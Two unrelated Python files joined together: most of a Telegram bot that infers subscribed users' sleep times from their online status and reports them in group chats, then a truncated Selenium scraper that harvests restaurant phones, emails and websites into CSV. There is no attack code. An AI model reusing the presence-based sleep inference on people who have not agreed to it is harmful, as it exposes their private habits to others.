        zone_tab = pytz.open_resource('zone.tab')
        try:
            for line in zone_tab:
                line = line.decode('UTF-8')
                if line.startswith('#'):
                    continue
                code, coordinates, zone = line.split(None, 4)[:3]
                match = re_zoneloc.match(coordinates)
                if match:
                    data[zone] = self._convert_coordinates(match)
            self.data = data
        finally:
            zone_tab.close()
timezone_location = _TimezoneLocationDict()
def init_db():
    """Open the SQLite database, create missing tables, and return all
    known users as {id: row-dict} (used to seed the user cache)."""
    global DB, CONN
    DB = sqlite3.connect(CFG['database'])
    DB.row_factory = sqlite3.Row
    CONN = DB.cursor()
    # Telegram users plus the bot's per-user settings.
    CONN.execute('CREATE TABLE IF NOT EXISTS users ('
        'id INTEGER PRIMARY KEY,' # peer_id
        'username TEXT,'
        'first_name TEXT,'
        'last_name TEXT,'
        'subscribed INTEGER,'
        'timezone TEXT'
    ')')
    # Which chats each user has been seen in.
    CONN.execute('CREATE TABLE IF NOT EXISTS user_chats ('
        'user INTEGER,'
        'chat INTEGER,'
        'PRIMARY KEY (user, chat),'
        'FOREIGN KEY (user) REFERENCES users(id)'
    ')')
    # Raw activity timestamps (one row per observed online event).
    CONN.execute('CREATE TABLE IF NOT EXISTS events ('
        'user INTEGER,'
        'time INTEGER,'
        'PRIMARY KEY (user, time),'
        'FOREIGN KEY (user) REFERENCES users(id)'
    ')')
    # Detected sleep intervals: start time + duration in seconds.
    CONN.execute('CREATE TABLE IF NOT EXISTS sleep ('
        'user INTEGER,'
        'time INTEGER,'
        'duration INTEGER,'
        'PRIMARY KEY (user, time),'
        'FOREIGN KEY (user) REFERENCES users(id)'
    ')')
    users = {}
    for row in CONN.execute('SELECT * FROM users'):
        users[row['id']] = dict(row)
    return users
def update_user_group(user, chat):
    """Record that `user` belongs to group `chat` (no-op for private chats)."""
    # 'group' and 'supergroup' both end with "group".
    if chat['type'].endswith('group'):
        # tg-cli users carry 'peer_id'; Bot API users carry 'id'.
        uid = user.get('peer_id') or user['id']
        CONN.execute('INSERT OR IGNORE INTO user_chats (user, chat) VALUES (?, ?)', (uid, chat['id']))
def update_user(user, subscribed=None, timezone=None):
    """Insert or update a user row and the in-memory USER_CACHE.

    `subscribed`/`timezone` are only written when provided; for brand-new
    users they default to unsubscribed and CFG['defaulttz'].
    """
    # tg-cli users carry 'peer_id'; Bot API users carry 'id'.
    uid = user.get('peer_id') or user['id']
    if uid in USER_CACHE:
        # Build the optional part of the UPDATE clause dynamically;
        # placeholders only, so this string concat is SQL-injection safe.
        updkey = ''
        updval = [user.get('username') or None, user.get('first_name', ''),
                  user.get('last_name')]
        USER_CACHE[uid]['username'] = updval[0]
        USER_CACHE[uid]['first_name'] = updval[1]
        USER_CACHE[uid]['last_name'] = updval[2]
        if subscribed is not None:
            updkey += ', subscribed=?'
            updval.append(subscribed)
            USER_CACHE[uid]['subscribed'] = subscribed
        if timezone:
            updkey += ', timezone=?'
            updval.append(timezone)
            USER_CACHE[uid]['timezone'] = timezone
        updval.append(uid)
        CONN.execute('UPDATE users SET username=?, first_name=?, last_name=?%s WHERE id=?' % updkey, updval)
    else:
        # First sighting: cache and persist with defaults filled in.
        USER_CACHE[uid] = user
        timezone = USER_CACHE[uid]['timezone'] = timezone or CFG['defaulttz']
        subscribed = USER_CACHE[uid]['subscribed'] = subscribed or 0
        CONN.execute('REPLACE INTO users VALUES (?,?,?,?,?,?)',
            (uid, user.get('username') or None, user.get('first_name', ''),
             user.get('last_name'), subscribed, timezone))
def user_event(user, eventtime):
    """Store one activity timestamp for a subscribed user."""
    uid = user.get('peer_id') or user['id']
    if uid in USER_CACHE and USER_CACHE[uid]['subscribed']:
        # https://github.com/vysheng/tg/wiki/Scripting-notes
        # > To check whether a user is online, update the contact list and
        # > compare user_status["when"] with the current time. If the status
        # > is in the future, the contact is online right now.
        now = int(time.time())
        # Clamp "online right now" future timestamps to the present.
        if eventtime > now:
            eventtime = now
        CONN.execute('INSERT OR IGNORE INTO events (user, time) VALUES (?, ?)', (uid, eventtime))
def user_last_seen(user):
    """Return the newest recorded activity timestamp for a subscribed
    user, or None when the user is unknown/unsubscribed/has no events."""
    uid = user.get('peer_id') or user['id']
    if uid in USER_CACHE and USER_CACHE[uid]['subscribed']:
        res = CONN.execute('SELECT time FROM events WHERE '
            'user = ? ORDER BY time DESC LIMIT 1', (uid,)).fetchone()
        if res:
            return res[0]
def hour_minutes(seconds, zpad=True):
    """Format a duration in seconds as H:MM ('%02d:%02d' when zpad)."""
    total_minutes = round(seconds / 60)
    hours, minutes = divmod(total_minutes, 60)
    fmt = '%02d:%02d' if zpad else '%d:%02d'
    return fmt % (hours, minutes)
def replace_dt_time(fromdatetime, seconds):
    """Return the same calendar day as `fromdatetime` at `seconds` past
    local midnight, DST-normalized via the (pytz) tzinfo."""
    tz = fromdatetime.tzinfo
    return tz.normalize(datetime.datetime.combine(fromdatetime,
        datetime.time(tzinfo=tz)) + datetime.timedelta(seconds=seconds))
def replace_dt_hours(fromdatetime, hours):
    """Like replace_dt_time, but the offset from midnight is in hours."""
    tz = fromdatetime.tzinfo
    return tz.normalize(datetime.datetime.combine(fromdatetime,
        datetime.time(tzinfo=tz)) + datetime.timedelta(hours=hours))
def midnight_delta(fromdatetime, adjust=True):
    """Seconds elapsed since local midnight of `fromdatetime`'s day.

    With adjust=True, afternoons/evenings (more than 12h past midnight)
    are returned as a negative offset from the *next* midnight, so times
    around midnight form a continuous range.
    """
    tz = fromdatetime.tzinfo
    midnight_ts = datetime.datetime.combine(
        fromdatetime, datetime.time(tzinfo=tz)).timestamp()
    delta = fromdatetime.timestamp() - midnight_ts
    if adjust and delta > 43200:
        delta -= 86400
    return delta
def midnight_adjust(delta):
    """Fold a negative midnight offset (see midnight_delta) back into [0, 86400)."""
    if delta < 0:
        return delta + 86400
    return delta
def tz_is_day(dt, tzname, lat=None, lon=None):
    """Return True if the sun appears to be up at `dt` in timezone `tzname`.

    Falls back to "06:00-18:00 is day" when the zone has no known
    principal location and no explicit lat/lon is given.
    """
    timezone = dt.tzinfo
    # UTC offset expressed in degrees of longitude (240 s per degree).
    offset = timezone.utcoffset(dt).total_seconds() / 240
    # Wall-clock hours since local midnight.
    clocktime = midnight_delta(dt, False) / 3600
    if lat is None:
        if tzname in timezone_location:
            lat, lon = timezone_location[tzname]
        elif 6 <= clocktime < 18:
            return True
        else:
            return False
    # Mean solar time at the location's longitude.
    localtime = (clocktime + (lon-offset) / 15 + 24) % 24
    # NOTE(review): the series below appears to be a Fourier approximation
    # of the solar declination over the year; coefficients as given.
    a = 2 * math.pi * (dt.timetuple().tm_yday + localtime / 24) / 365
    phi = 0.006918 - 0.399912 * math.cos(a) + 0.070257*math.sin(a) - \
        0.006758 * math.cos(2*a) + 0.000907 * math.sin(2*a) - \
        0.002697 * math.cos(3*a) + 0.001480 * math.sin(3*a)
    latrad = math.radians(lat)
    # Solar elevation angle; positive means the sun is above the horizon.
    h0 = math.asin(math.cos(math.radians((localtime - 12) * 15)) *
        math.cos(latrad) * math.cos(phi) + math.sin(latrad) * math.sin(phi))
    return (h0 > 0)
def user_status(uid, events):
    '''
    Identify sleep time using rules as follows:
     -24h    0   6   now
      /=====================\ <- SELECT
      .    x-+-----------+----💤?
      .      |       x-----+----💤?
      .      |           | x  🌞?
      . x-+--------x     x|  xx
      .  x-+-----------+--x
      . xx|   x------x   x|  xx
      .    |   x   x-------+-x
      .  x |    x------+--x
      .  x |     x-------x |  🌞?
      x    .               |  🌞?
      . x  |               |x 🌞?
    Legend:
    x  user event
    .  select boundary (last 24h)
    -  sleep duration
    |  cut window (0:00 ~ 6:00 local time)
    💤 maybe sleeping
    🌞 maybe awake

    Returns (start, interval, complete): sleep start timestamp, its
    duration in seconds (None while possibly still asleep), and whether
    an event after the cut window confirmed the wake-up.
    `events` is an iterable of (user, time) ordered by time ascending.
    '''
    start, interval = None, None
    usertime = datetime.datetime.now(pytz.timezone(USER_CACHE[uid]['timezone']))
    # The local "cut window" (e.g. 0:00-6:00) in absolute timestamps.
    window = (replace_dt_time(usertime, CFG['cutwindow'][0]).timestamp(),
              replace_dt_time(usertime, CFG['cutwindow'][1]).timestamp())
    lasttime = None
    left, right = None, None
    complete = True
    # Candidate (gap length, gap start) pairs between consecutive events.
    intervals = []
    for _user, etime in events:
        if lasttime:
            intervals.append((etime - lasttime, lasttime))
            lasttime = etime
            if etime > window[1]:
                right = etime
                break
        elif etime > window[1]:
            # First event already past the window: pair with the last
            # pre-window event, if any.
            if left:
                intervals.append((etime - left, left))
            lasttime = right = etime
            break
        elif etime < window[0]:
            # Still before the window; remember the latest such event.
            left = etime
        elif left:
            intervals.append((etime - left, left))
            lasttime = etime
            if etime > window[1]:
                right = etime
                break
        else:
            lasttime = etime
    if intervals:
        complete = right is not None
        # Longest offline gap is the sleep candidate.
        interval, start = max(intervals)
        if interval > CFG['threshold']:
            # offline for too long
            start = interval = None
    elif lasttime:
        start = lasttime
    elif left:
        start = left
    # else: pass
    if interval is None and start and usertime.timestamp() - start > CFG['threshold']:
        # also offline for too long
        start = None
    return start, interval, complete
def user_status_update(uid):
    """Recompute one user's sleep status from the last 24h of events and
    persist it to the `sleep` table when the interval is confirmed."""
    expires = time.time() - 86400
    start, interval, complete = user_status(uid, CONN.execute(
        'SELECT events.user, events.time FROM events'
        ' INNER JOIN users ON events.user = users.id'
        ' WHERE events.user = ? AND events.time >= ?'
        ' AND users.subscribed = 1'
        ' ORDER BY events.user ASC, events.time ASC', (uid, expires)))
    # Only store confirmed (complete) sleep intervals.
    if start and interval and complete:
        CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
            (uid, start, interval))
    return start, interval, complete
def group_status_update(chat):
    """Recompute sleep status for every subscribed member of `chat`.

    Returns [(uid, start, interval), ...] sorted by longest sleep first;
    confirmed intervals are persisted to the `sleep` table.
    """
    expires = time.time() - 86400
    uid = chat['id']
    stats = []
    # groupby requires the rows ordered by user, which the SQL guarantees.
    for user, group in itertools.groupby(tuple(CONN.execute(
        'SELECT events.user, events.time FROM events'
        ' INNER JOIN users ON events.user = users.id'
        ' INNER JOIN user_chats ON events.user = user_chats.user'
        ' WHERE user_chats.chat = ? AND events.time >= ?'
        ' AND users.subscribed = 1'
        ' ORDER BY events.user ASC, events.time ASC', (uid, expires))),
        key=operator.itemgetter(0)):
        start, interval, complete = user_status(user, group)
        stats.append((user, start, interval))
        if start and interval and complete:
            CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
                (user, start, interval))
    stats.sort(key=lambda x: (-x[2] if x[2] else 0, x[1] or float('inf'), x[0]))
    return stats
def all_status_update():
    """Recompute sleep status for all subscribed users, then garbage-collect
    expired events and over-threshold sleep rows.  Returns the stats list."""
    expires = time.time() - 86400
    stats = []
    for user, group in itertools.groupby(tuple(CONN.execute(
        'SELECT events.user, events.time FROM events'
        ' INNER JOIN users ON events.user = users.id'
        ' WHERE events.time >= ? AND users.subscribed = 1'
        ' ORDER BY events.user ASC, events.time ASC', (expires,))),
        key=operator.itemgetter(0)):
        start, interval, complete = user_status(user, group)
        stats.append((user, start, interval))
        if start and interval and complete:
            CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
                (user, start, interval))
    # Housekeeping: drop stale events and implausible "sleep" intervals.
    CONN.execute('DELETE FROM events WHERE time < ?', (expires,))
    CONN.execute('DELETE FROM sleep WHERE duration > ?', (CFG['threshold'],))
    return stats
def update_group_members(chat):
    """Best-effort refresh of `chat`'s member list via tg-cli, updating
    membership rows and recording last-seen ('when') events."""
    members = None
    try:
        members = tg_get_members(chat)
    except Exception:
        # tg-cli may be unavailable; silently skip the refresh.
        pass
    if members:
        for m in members:
            update_user_group(m, chat)
            if 'when' in m:
                user_event(m, tg_mktime(m['when']))
@functools.lru_cache(maxsize=100)
def db_getuidbyname(username):
    """Resolve '@username' or '#<id>' to a numeric user id (None if unknown).

    NOTE(review): results (including misses) are LRU-cached, so renames in
    the users table may be served stale until eviction.
    """
    if username.startswith('#'):
        # Literal id form: '#12345'.
        try:
            return int(username[1:])
        except ValueError:
            return None
    else:
        # LIKE makes the lookup case-insensitive for ASCII usernames.
        uid = CONN.execute('SELECT id FROM users WHERE username LIKE ?', (username,)).fetchone()
        if uid:
            return uid[0]
def cmd_status(expr, chatid, replyid, msg):
    '''/status [all|@username] - List sleeping status'''
    # Target resolution: explicit @username > replied-to user >
    # 'all' (group only) > the sender.
    if expr and expr[0] == '@':
        uid = db_getuidbyname(expr[1:])
        if not uid:
            sendmsg(_('User not found.'), chatid, replyid)
            return
    elif 'reply_to_message' in msg:
        uid = msg['reply_to_message']['from']['id']
    elif expr == 'all' and chatid < 0:
        # uid None means "whole group" below.
        uid = None
    else:
        uid = msg['from']['id']
        if uid not in USER_CACHE:
            sendmsg(_('Please first /subscribe.'), chatid, replyid)
            return
    if uid:
        # Single-user report.
        usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
        usertime = datetime.datetime.now(usertz)
        lastseen = user_last_seen(USER_CACHE[uid])
        if lastseen:
            userseendelta = usertime - datetime.datetime.fromtimestamp(
                lastseen, usertz)
        else:
            userseendelta = None
        text = [_('%s: local time is %s (%s)') % (
            getufname(USER_CACHE[uid]), usertime.strftime('%H:%M'),
            USER_CACHE[uid]['timezone'])]
        if USER_CACHE[uid]['subscribed']:
            start, interval, complete = user_status_update(uid)
            # Only show last-seen for other users, not the requester.
            if uid != msg['from']['id'] and userseendelta:
                ndelta = humanizetime.naturaldelta(userseendelta)
                if ndelta in (_("a moment"), _("now")):
                    text.append(_('Online'))
                else:
                    text.append(_('Last seen: %s ago') % ndelta)
            cutstart, cutend = CFG['cutwindow']
            cutmid = (cutstart + cutend) / 2
            if start:
                userstart = datetime.datetime.fromtimestamp(start, usertz)
                if interval:
                    end = userstart + datetime.timedelta(seconds=interval)
                #  0     3     6
                #  +===========+
                #  |  ---+-----+--x
                #  ^start ^end   ^now
                #  sure
                #  | ----+---x  |
                #  ^start ^end+now
                #  we are not sure, so don't write the db
                if interval and (complete or midnight_delta(end) > cutmid):
                    text.append(_('Last sleep: %s, %s→%s') % (
                        hour_minutes(interval, False),
                        userstart.strftime('%H:%M'), end.strftime('%H:%M')))
                #  |     |     |  and is current user
                #     ^now
                elif (uid == msg['from']['id'] and
                      cutstart < midnight_delta(usertime) < cutmid):
                    text.append(_('Go to sleep!'))
                #  |  x  |     |
                #     ^start ^now
                #        ^s ^now
                else:
                    text.append(_('Sleep: %s→💤') % userstart.strftime('%H:%M'))
            else:
                text.append(_('Not enough data.'))
        else:
            text.append(_('Not subscribed.'))
        sendmsg('\n'.join(text), chatid, replyid)
    else:
        # Whole-group report, one line per member with data.
        update_group_members(msg['chat'])
        text = []
        startsum = intrvsum = 0
        validstartcount = validintervcount = 0
        for uid, start, interval in group_status_update(msg['chat']):
            if not start:
                continue
            dispname = getufname(USER_CACHE[uid])
            usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
            userstart = datetime.datetime.fromtimestamp(start, usertz)
            startsum += midnight_delta(userstart)
            validstartcount += 1
            if interval:
                end = userstart + datetime.timedelta(seconds=interval)
                text.append('%s: %s, %s→%s' % (dispname,
                    hour_minutes(interval, False),
                    userstart.strftime('%H:%M'), end.strftime('%H:%M')))
                intrvsum += interval
                validintervcount += 1
            else:
                # Still (apparently) asleep.
                text.append('%s: %s→💤' % (dispname, userstart.strftime('%H:%M')))
        if validintervcount:
            avgstart = startsum/validstartcount
            avginterval = intrvsum/validintervcount
            text.append(_('Average: %s, %s→%s') % (
                hour_minutes(avginterval, False),
                hour_minutes(midnight_adjust(avgstart)),
                hour_minutes(midnight_adjust(avgstart + avginterval))))
        sendmsg('\n'.join(text) or _('Not enough data.'), chatid, replyid)
def user_average_sleep(usertz, iterable):
    """Average one user's sleep records.

    `iterable` yields (start_timestamp, duration_seconds) pairs.
    Returns (avg_start_offset_from_midnight, avg_duration), or
    (None, None) when there are no records.
    """
    startsum = intrvsum = 0
    count = 0
    for start, duration in iterable:
        userstart = datetime.datetime.fromtimestamp(start, usertz)
        # midnight_delta keeps times around midnight continuous (negative
        # offsets for late evenings), so they average sensibly.
        startsum += midnight_delta(userstart)
        intrvsum += duration
        count += 1
    if count:
        avgstart = startsum/count
        avginterval = intrvsum/count
        return (avgstart, avginterval)
    else:
        return (None, None)
def group_average_sleep(uid=None, fulllist=False):
    """Average sleep for one chat (`uid` = chat id) or globally (uid=None).

    Returns (avgstart, avginterval); with fulllist=True also returns the
    per-user stats list first.  Non-fulllist results are memoized for
    600 seconds in group_average_sleep.cache.
    """
    _self_cache = group_average_sleep.cache
    _cache_ttl = 600
    if fulllist:
        stats = []
    else:
        # Serve from the TTL cache when fresh.
        try:
            timestamp, avgstart, avginterval = _self_cache[uid]
            if time.time() - timestamp < _cache_ttl:
                return avgstart, avginterval
        except KeyError:
            pass
    startsum = intrvsum = 0
    count = 0
    if uid:
        result = CONN.execute(
            'SELECT sleep.user, sleep.time, sleep.duration FROM sleep'
            ' INNER JOIN users ON sleep.user = users.id'
            ' INNER JOIN user_chats ON sleep.user = user_chats.user'
            ' WHERE user_chats.chat = ? AND users.subscribed = 1'
            ' ORDER BY sleep.user', (uid,))
    else:
        result = CONN.execute(
            'SELECT sleep.user, sleep.time, sleep.duration FROM sleep'
            ' INNER JOIN users ON sleep.user = users.id'
            ' WHERE users.subscribed = 1 ORDER BY sleep.user')
    # Average per user first, then average those averages.
    for user, group in itertools.groupby(result, key=operator.itemgetter(0)):
        usertz = pytz.timezone(USER_CACHE[user]['timezone'])
        avgstart, avginterval = user_average_sleep(usertz,
            map(operator.itemgetter(1, 2), group))
        if fulllist:
            stats.append((avginterval, avgstart, getufname(USER_CACHE[user])))
        count += 1
        startsum += avgstart
        intrvsum += avginterval
    avgstart = avginterval = None
    if count:
        avgstart = startsum/count
        avginterval = intrvsum/count
    if fulllist:
        return stats, avgstart, avginterval
    else:
        _self_cache[uid] = (time.time(), avgstart, avginterval)
        return avgstart, avginterval
# TTL cache storage: {chat_or_None: (timestamp, avgstart, avginterval)}.
group_average_sleep.cache = {}
def cmd_average(expr, chatid, replyid, msg):
    '''/average - List statistics about sleep time'''
    # 'all' in a group chat means "summarize the whole group".
    if expr == 'all' and chatid < 0:
        uid = None
    else:
        uid = msg['from']['id']
        if uid not in USER_CACHE:
            sendmsg(_('Please first /subscribe.'), chatid, replyid)
            return
    text = []
    if uid:
        # Personal average for the requester.
        usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
        avgstart, avginterval = user_average_sleep(usertz, CONN.execute(
            'SELECT time, duration FROM sleep WHERE user = ?', (uid,)))
        if avgstart is not None:
            text.append(_('Average: %s, %s→%s') % (hour_minutes(avginterval, False),
                hour_minutes(midnight_adjust(avgstart)),
                hour_minutes(midnight_adjust(avgstart + avginterval))))
        else:
            text.append(_('Not enough data.'))
        if chatid > 0:
            # Private chat: add the all-users average for comparison.
            avgstart, avginterval = group_average_sleep(None)
            if avgstart and avginterval:
                text.append(_('Global average: %s, %s→%s') % (
                    hour_minutes(avginterval, False),
                    hour_minutes(midnight_adjust(avgstart)),
                    hour_minutes(midnight_adjust(avgstart + avginterval))))
        else:
            # Group chat: add this group's average.
            avgstart, avginterval = group_average_sleep(msg['chat']['id'])
            if avgstart and avginterval:
                text.append(_('Group average: %s, %s→%s') % (
                    hour_minutes(avginterval, False),
                    hour_minutes(midnight_adjust(avgstart)),
                    hour_minutes(midnight_adjust(avgstart + avginterval))))
    else:
        # Full per-member listing plus the group average.
        update_group_members(msg['chat'])
        uid = msg['chat']['id']
        stats, avgstart, avginterval = group_average_sleep(uid, True)
        if stats:
            stats.sort(key=lambda x: (-x[0], x[1], x[2]))
            for interval, start, dispname in stats:
                text.append('%s: %s, %s→%s' % (dispname,
                    hour_minutes(interval, False),
                    hour_minutes(midnight_adjust(start)),
                    hour_minutes(midnight_adjust(start + interval))))
            text.append(_('Group average: %s, %s→%s') % (
                hour_minutes(avginterval, False),
                hour_minutes(midnight_adjust(avgstart)),
                hour_minutes(midnight_adjust(avgstart + avginterval))))
        else:
            text.append(_('Not enough data.'))
    sendmsg('\n'.join(text), chatid, replyid)
def cmd_subscribe(expr, chatid, replyid, msg):
    '''/subscribe - Add you to the watchlist'''
    # Persist subscribed=True for the sender and confirm.
    update_user(msg['from'], True)
    sendmsg(_("%s, you are subscribed.") % getufname(msg['from']), chatid, replyid)
def cmd_unsubscribe(expr, chatid, replyid, msg):
    '''/unsubscribe - Remove you from the watchlist'''
    # Persist subscribed=False for the sender and confirm.
    update_user(msg['from'], False)
    sendmsg(_("%s, you are unsubscribed.") % getufname(msg['from']), chatid, replyid)
def cmd_settz(expr, chatid, replyid, msg):
    '''/settz - Set your timezone'''
    # Only accept canonical IANA zone names known to pytz.
    if expr and expr in pytz.all_timezones_set:
        update_user(msg['from'], timezone=expr)
        sendmsg(_("Your timezone is %s now.") % expr, chatid, replyid)
    else:
        # Invalid or missing zone: report the current setting instead.
        try:
            current = USER_CACHE[msg['from']['id']]['timezone']
        except KeyError:
            current = CFG['defaulttz']
        sendmsg(_("Invalid timezone. Your current timezone is %s.") % current, chatid, replyid)
def cmd_time(expr, chatid, replyid, msg):
    '''/time - Get time for various timezones'''
    # Keep only arguments that are valid tz database names.
    tzs = list(filter(lambda x: x in pytz.all_timezones_set, expr.split()))
    if not tzs:
        if chatid > 0:
            # No argument in a private chat: default to the sender's timezone.
            tzs = [USER_CACHE[msg['from']['id']]['timezone']]
        else:
            # No argument in a group chat: list the members' distinct
            # timezones, most common first.
            tzs = [row[0] for row in CONN.execute(
                'SELECT users.timezone FROM users'
                ' INNER JOIN user_chats ON users.id = user_chats.user'
                ' WHERE user_chats.chat = ? GROUP BY users.timezone'
                ' ORDER BY count(users.timezone) DESC, users.timezone ASC',
                (msg['chat']['id'],))]
    if tzs:
        text = [_('The time is:')]
        for tz in tzs:
            usertime = datetime.datetime.now(pytz.timezone(tz))
            # Sun/moon emoji flags day vs night at that location.
            text.append(' '.join((
                '🌞' if tz_is_day(usertime, tz) else '🌜',
                usertime.strftime('%H:%M'), tz
            )))
        sendmsg('\n'.join(text), chatid, replyid)
    else:
        sendmsg(_("No timezone specified."), chatid, replyid)
def cmd_start(expr, chatid, replyid, msg):
    # Intentionally no docstring: cmd_help only lists commands with a
    # docstring, so /start stays hidden from the /help output.
    # chatid > 0 appears to select private chats (cf. cmd_time) -- confirm.
    if chatid > 0:
        sendmsg(_("This is Trusted Sleep Bot. It can track users' sleep habit by using Telegram online status. Send me /help for help."), chatid, replyid)
def cmd_help(expr, chatid, replyid, msg):
    '''/help - Show usage'''
    if expr:
        # "/help <command>": show that one command's docstring.
        if expr in COMMANDS:
            h = _(COMMANDS[expr].__doc__)
            if h:
                sendmsg(h, chatid, replyid)
            else:
                sendmsg(_('Help is not available for %s') % expr, chatid, replyid)
        else:
            sendmsg(_('Command not found.'), chatid, replyid)
    else:
        # Bare "/help": list every command that carries a docstring.
        sendmsg('\n'.join(_(cmd.__doc__) for cmdname, cmd in COMMANDS.items() if cmd.__doc__), chatid, replyid)
def getufname(user, maxlen=100):
    """Return the user's display name ("First Last"), truncated to
    *maxlen* characters plus an ellipsis when too long."""
    parts = [user['first_name'] or '']
    last = user.get('last_name')
    if last:
        parts.append(last)
    full = ' '.join(parts)
    if len(full) > maxlen:
        return full[:maxlen] + '…'
    return full
def load_config():
    """Read config.json (UTF-8) and return it as an AttrDict."""
    # Use a context manager so the file handle is closed promptly instead
    # of being leaked until garbage collection.
    with open('config.json', encoding='utf-8') as f:
        return AttrDict(json.load(f))
def save_config():
    """Persist CFG back to config.json and commit the database."""
    # Context manager guarantees the JSON file is flushed and closed
    # before the DB commit, instead of leaking the handle.
    with open('config.json', 'w') as f:
        json.dump(CFG, f, sort_keys=True, indent=1)
    DB.commit()
def handle_update(obj):
    """Route an incoming event: Bot API updates carry an "update_id"
    field; everything else comes from telegram-cli."""
    handler = handle_api_update if "update_id" in obj else handle_tg_update
    handler(obj)
def sig_exit(signum, frame):
    # SIGTERM handler: persist state and shut down telegram-cli cleanly.
    save_config()
    TGCLI.close()
    logging.info('Exited upon signal %s' % signum)
# should document usage in docstrings
# Dispatch table: command name -> handler.  Insertion order controls the
# order commands are listed by /help.
COMMANDS = collections.OrderedDict((
    ('status', cmd_status),
    ('average', cmd_average),
    ('settz', cmd_settz),
    ('time', cmd_time),
    ('subscribe', cmd_subscribe),
    ('unsubscribe', cmd_unsubscribe),
    ('help', cmd_help),
    ('start', cmd_start)
))
if __name__ == '__main__':
    CFG = load_config()
    # Install gettext translations from the 'locale' directory next to the
    # script, for the languages listed in the config.
    translation = gettext.translation('tsleepd', os.path.join(
        os.path.dirname(os.path.abspath(os.path.realpath(sys.argv[0] or 'locale'))),
        'locale'), CFG['languages'])
    translation.install(('ngettext',))
    DB, CONN = None, None
    MSG_Q = queue.Queue()  # events queued for the main loop below
    USER_CACHE = {}
    # Start telegram-cli and feed every JSON event it emits into the queue.
    TGCLI = tgcli.TelegramCliInterface(CFG.tgclibin)
    TGCLI.ready.wait()
    TGCLI.on_json = MSG_Q.put
    signal.signal(signal.SIGTERM, sig_exit)
    try:
        USER_CACHE = init_db()
        all_status_update()
        updatebotinfo()
        # Poll the Bot API in a daemon thread; the main thread consumes
        # the shared queue forever.
        apithr = threading.Thread(target=getupdates)
        apithr.daemon = True
        apithr.start()
        while 1:
            handle_update(MSG_Q.get())
    finally:
        save_config()
        TGCLI.close()
|
import requests # pip install requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
import urllib.request
from urllib.error import HTTPError
from urllib.error import URLError
from datetime import datetime
from socket import timeout
from requests.exceptions import ConnectionError
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import json, errno, os, time, glob, sys, codecs
def loadFileDescargados():
    """Populate the global lista_URL with one stripped URL per line read
    from urls.csv.  A missing file simply leaves the list empty."""
    # 'with' guarantees the file is closed even if a read fails; the old
    # version leaked the handle on error and printed a pointless blank line.
    try:
        with open("urls.csv", "r") as file:
            for line in file:
                lista_URL.append(line.strip())
    except FileNotFoundError:
        pass
    return
def createFileCSV(filename):
    """Write the rows accumulated in the global listaCSV to
    <filename>.csv, preceded by the fixed header row."""
    # 'with' closes the file even on error (old code leaked it on failure).
    # The header is emitted verbatim, including the historical
    # "Feactures" spelling, to keep downstream consumers working.
    with open(filename + '.csv', "w") as file:
        file.write('Name,Description,Phone,Directions,Website,Email,Cuisines,Horarios,Feactures,Meals,GoodFor,Url\n')
        for valor in listaCSV:
            # Drop any non-ASCII characters before writing.
            yourstring = valor.encode('ascii', 'ignore').decode('ascii')
            file.write(yourstring + '\n')
    return
#
#
# ********************************** Programa principal **********************************
#
#
# Accumulators: URLs to scrape and the CSV rows built so far.
lista_URL =[];
listaCSV =[];
loadFileDescargados()
iterar = 0;  # rows scraped since the last CSV flush
archi = 0;   # sequence number for the numbered output CSV files
browser = webdriver.Firefox()
for url in lista_URL:
    iterar=iterar+1;
    # Fetch and parse the restaurant page.
    response = urllib.request.urlopen(url, timeout=120)
    html = response.read()
    html = BeautifulSoup(html, 'html.parser');
    nombre = html.find_all(class_='heading_title')[0].text.strip();
    # Each optional field falls back to '' when its element is missing.
    try:
        tel = html.find_all(class_='blEntry phone')[0].text.strip();
    except:
        tel = ''
    try:
        dire = html.find_all(class_='address')[0].text.strip();
    except (FileNotFoundError):
        # NOTE(review): FileNotFoundError cannot be raised by this lookup;
        # an IndexError from an empty find_all would escape.  Presumably
        # this should be the bare except used for the other fields.
        dire = ''
    try:
        cuisines = html.find_all(class_='ui_column is-6 cuisines')[0].find_all(class_='text')[0].text.strip();
    except:
        cuisines = ''
    # Build the opening-hours string, one "<day> <ranges>" entry per line.
    horaComp = ''
    try:
        horas = html.find_all(class_='hours content')[0].find_all(class_='detail');
        for textt in horas:
            horadia = '----';
            for thor in textt.find_all(class_='hoursRange'):
                horadia = horadia + ' / ' + thor.text
            horadia = textt.find_all(class_='day')[0].text + ' ' + horadia;
            horaComp = horaComp + horadia.replace("---- /","") + '\n';
    except:
        horaComp = ''
    filas = html.find_all(class_='details_tab')[0].find_all(class_='row');
    features = ''
    try:
        for textt in filas:
            if "Restaurant features" in (str(textt)):
                features = textt.find_all(class_='content')[0].text.strip()
    except:
        features = ''
    meals = ''
    try:
        for textt in filas:
            if "Meals" in (str(textt)):
                meals = textt.find_all(class_='content')[0].text.strip()
    except:
        meals = ''
    descri = ''
    try:
        descripp = html.find_all(class_='additional_info');
        for textt in descripp:
            if "Description " in (str(textt)):
                descri = textt.find_all(class_='content')[0].text.strip()
    except:
        descri = ''
    goodFor = '';
    try:
        for textt in filas:
            if "Good for" in (str(textt)):
                goodFor = textt.find_all(class_='content')[0].text.strip()
    except:
        goodFor = '';
    email = '';
    try:
        email2 = html.find_all(class_='detailsContent')[0].find_all('li');
        for textt in email2:
            if "E-mail" in (str(textt)):
                email = textt.find_all('a')[0]['href'].strip().replace("mailto:","")
    except :
        email = '';
    # The real website URL hides behind a click-through: open the page in
    # Selenium, click the link, wait for the new tab to finish loading and
    # read its final URL.
    website = '';
    try:
        pino = '1';
        # Close every browser tab except the first one.
        for aa in browser.window_handles:
            if (pino == '1'):
                pino='true'
            else:
                browser.switch_to_window(aa)
                browser.close()
        browser.switch_to_window(browser.window_handles[0])
        browser.get(url)
        browser.find_element_by_css_selector('div.blEntry:nth-child(3)').click();
        browser.switch_to_window(browser.window_handles[1])
        website = browser.current_url
        while( "about:blank" in website):
            time.sleep(5)
            website = browser.current_url
        browser.close()
    except :
        website = '';
    print (nombre + ' ' + website)
    # Quote every field; embedded double quotes are stripped outright.
